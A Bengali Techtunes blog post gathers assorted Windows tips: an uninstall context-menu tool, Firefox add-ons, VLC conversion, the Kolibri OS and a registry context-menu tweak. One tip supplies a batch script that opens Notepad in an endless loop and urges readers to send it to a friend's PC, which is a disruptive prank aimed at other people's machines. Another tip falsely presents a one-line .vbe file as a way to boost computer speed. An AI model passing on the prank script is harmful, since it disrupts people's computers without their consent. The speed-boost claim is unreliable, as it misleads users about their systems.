আসসালামু-আলাইকুম,
দেখতে দেখতে 50 টা টিউন করেই ফেললাম !!!
আজ আমার ৫০ তম টিউন ।
আমার ইচ্ছা আজ আপনাদের কিছু চমৎকার জিনিস দেব ।
তো আসুন শুরু করি...
রাইট ক্লিকে Uninstall এনে দিলে মন্দ হয় না ।
কষ্ট করে Control Panel-এ ঢুকে Uninstall করতে হবে না ।
এর জন্য প্রথমে এই সফটওয়্যারটি Download করে Install করুন ।
এরপর দেখবেন আপনার রাইট ক্লিকে Uninstall অপশন যুক্ত হয়েছে।
এখন আপনি যেই সফটওয়্যার Uninstall করতে চান তার ওপর রাইট ক্লিক করে Uninstall-এ ক্লিক করুন ।
এরপর নতুন Screen আসবে । Standard Uninstall-এ ক্লিক করুন ।
ব্যস......
এবার Noteppad বারবার খুলবে আর বন্ধ হবে । 😛 😆
প্রথমে আপনার Notepad খুলুন...
এবার নিচের Code টা কপি/পেস্ট করুন ।
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
এবার Save করুন anyname.bat নামে । যেমনঃ tech.bat or apple.bat ইত্যাদি...
😀 এবার বন্ধুর পিসিতে send করে দিন। 😀 😀
কাজটি নিজের পিসিতে করতে যাবেন না।
এবার Notepad দিয়েই পিসির Speed টা বাড়িয়ে নিনপ্রথমে Notepad খুলে Code টা কপি-পেস্ট করুন...
mystring=(80000000)
এরপর save করুন boostup.vbe নামে ।
যখন আপনার মনে হবে কম্পিউটার slow, তখন এই File-এ ডাবল ক্লিক করবেন ।
রাইট ক্লিকে আপনার নাম এনে দিনNotepad ওপেন করে Code-টি লিখুন...
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\name]
@="<Your Name here>"
"Icon"="imageres.dll,206"
"Position"="Top"
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\name\command]
@="Control userpasswords"
Common add-on গুলোর (যেমনঃAdBlock Plus, WOT, Cool Previews) কথা আমরা কম-বেশি সবাই জানি ।
তাই আজ নিয়ে এলাম কিছু Uncommon চমৎকার Add-on..
এটা দিয়ে webpage-এর সব Image এক ক্লিকেই ডাউনলোড করতে পারবেন ।
Mozilla-তে Restart-এর কোন অপশন নেই । এই Add-on দিয়ে Mozilla রিস্টার্ট দিতে পারবেন ।
আপনার Youtube ব্যবহারের অভিজ্ঞতাই বদলে যাবে ।
Youtube-এ সার্চ করলে রেজাল্ট আসবে এমনভাবে...
Video -তে না ঢুকেই Video'র Preview দেখে নিতে পারবেন।
ADD-ON গুলো ডাউনলোড করতে নামের ওপর ক্লিক করুন।
প্রথমে VLC open করে Ctrl+R চাপুন । এরপর এমন Screen আসবে...
এরপর ভিডিও Add করুন,
এরপর কোথায় রাখবেন browse করে চিত্রে দেখান কাজগুলো করুন,
Start-এ ক্লিক করলে আপনার কাজ শেষ...
Kolbri OS হল বিশ্বের সবচেয়ে ছোট Graphical OS.
এর Basic OS মাত্র 1.4 mb 😛
আর Featured OS 3 mb 😆
দেখে নিন কিছু ScreenShot..
চালাতে কি কি লাগবে ??
-->> হে হে হে... 8 mb Ram.... 😛 আপনার দাদার কম্পিউটার দিয়েও চালাতে পারবেন 😛 😛 😛
কি ডাউনলোড করবার মন চায় ??? নিচের ছবিতে mouse দিয়ে একটা বাড়ি মারেন...
আজ আর না । হাত ব্যথা করছে । আর হ্যাঁ, আপনার টিউনটি ভাল লাগলে একটা অন্তত কমেন্ট করবেন, উৎসাহ দিবেন । আমার ত্রুটিগুলো ছোটভাই মনে করে ধরিয়ে দেবেন।
বিদায়...
আমি মল্লিক গালিব শাহরিয়ার। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 11 বছর 11 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 103 টি টিউন ও 1799 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
মল্লিক গালিব শাহরিয়ার, কম্পিউটার-প্রকৌশল বিভাগ, আহছানউল্লাহ বিজ্ঞান ও প্রযুক্তি বিশ্ববিদ্যালয় ।
হাফ সেনচুরী মারলেন ভাই . . 😀